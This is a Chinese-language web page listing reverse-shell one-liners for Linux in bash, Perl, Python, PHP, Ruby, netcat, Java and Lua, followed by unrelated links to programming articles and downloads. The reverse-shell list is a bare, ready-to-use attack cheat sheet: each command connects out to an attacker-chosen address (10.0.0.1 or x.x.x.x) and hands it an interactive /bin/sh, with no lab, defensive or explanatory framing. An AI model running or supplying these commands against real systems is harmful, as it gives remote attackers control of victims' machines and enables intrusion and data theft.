Linux 下多種編程語(yǔ)言的反彈 shell 方法

bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
python版本:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php版本:php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby版本:ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc 版本:nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
java 版本:r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
lua版本:lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
相關(guān)文章
談?wù)凩inux運(yùn)維人員是否需要掌握一門編程語(yǔ)言
這篇文章主要介紹了談?wù)凩inux運(yùn)維人員是否需要掌握一門編程語(yǔ)言,小編覺(jué)得還是挺不錯(cuò)的,具有一定借鑒價(jià)值,需要的朋友可以參考下,下面就來(lái)和我一起看看吧,希望大家在閱2018-01-24Elixir(函數(shù)式編程語(yǔ)言軟件) v1.5 官方免費(fèi)正式版
Elixir是一款免費(fèi)的函數(shù)式編程語(yǔ)言,建立在Erlang虛擬機(jī)之上,來(lái)構(gòu)建并發(fā)、分布式、容錯(cuò)應(yīng)用程序及熱代碼升級(jí),歡迎下載2017-07-27Julia(動(dòng)態(tài)高級(jí)編程語(yǔ)言) 2018 v1.0 官網(wǎng)最新版
Julia語(yǔ)言是一個(gè)新的高性能動(dòng)態(tài)高級(jí)編程語(yǔ)言。語(yǔ)法和其他編程語(yǔ)言類似,易于其他語(yǔ)言用戶學(xué)習(xí)。Julia擁有豐富的函數(shù)庫(kù),提供了數(shù)字精度、精致的增幅器(sophisticated ampli2018-08-15TypeScript 微軟腳本編程語(yǔ)言 v5.8.2 官方版
TypeScript是一個(gè)由微軟開(kāi)發(fā)的自由和開(kāi)源的編程語(yǔ)言,可以編譯成純JavaScript ,可以在任何瀏覽器、任何計(jì)算機(jī)和任何操作系統(tǒng)上運(yùn)行,歡迎下載2025-03-23- 眼看雞年就要來(lái)了,Win10也得發(fā)點(diǎn)跟IT有關(guān)的拜年祝福,“雞年大吉”就不錯(cuò)。那么怎么才能用編程語(yǔ)言來(lái)說(shuō)出這句幾年最流行的拜年語(yǔ)呢2017-01-27
代碼之髓:編程語(yǔ)言核心概念 (西尾·泰和) 中文pdf掃描版[57MB]
本書(shū)從編程語(yǔ)言設(shè)計(jì)的角度出發(fā),圍繞語(yǔ)言中共通或特有的核心概念,通過(guò)語(yǔ)言演變過(guò)程中的縱向比較和在多門語(yǔ)言中的橫向比較,清晰地呈現(xiàn)了程序設(shè)計(jì)語(yǔ)言中函數(shù)、類型、作用域2016-12-08Kotlin 1.1 JVM編程語(yǔ)言插件 中文免費(fèi)版
Kotlin是一個(gè)基于JVM的新的編程語(yǔ)言,可以編譯成Java字節(jié)碼,也可以編譯成JavaScript,方便在沒(méi)有JVM的設(shè)備上運(yùn)行2016-12-06編程語(yǔ)言Perl性能優(yōu)化的三大技巧總結(jié) 中文WORD版
本文和大家重點(diǎn)討論一下Perl性能優(yōu)化技巧,利用Perl開(kāi)發(fā)一些服務(wù)應(yīng)用時(shí),有時(shí)會(huì)遇到Perl性能或資源占用的問(wèn)題,可以巧用require裝載模塊,使用系統(tǒng)函數(shù)及XS化模塊,自寫(xiě)低2016-11-16Word怎么排版代碼類的文章? word中編程語(yǔ)言代碼樣式的設(shè)置方法
Word怎么排版代碼類的文章?word中輸入的是變成代碼,排版和文字排版顯然不同,該怎么給代碼排版呢?下面我們就來(lái)看看word中編程語(yǔ)言代碼樣式的設(shè)置方法,需要的朋友可以參2016-10-28- 如果你正在考慮從哪里入門編程,看完這篇你也許會(huì)清晰一些。這篇文章給大家詳細(xì)對(duì)比9門主流編程語(yǔ)言,有需要的朋友們可以一起看一看。2016-09-27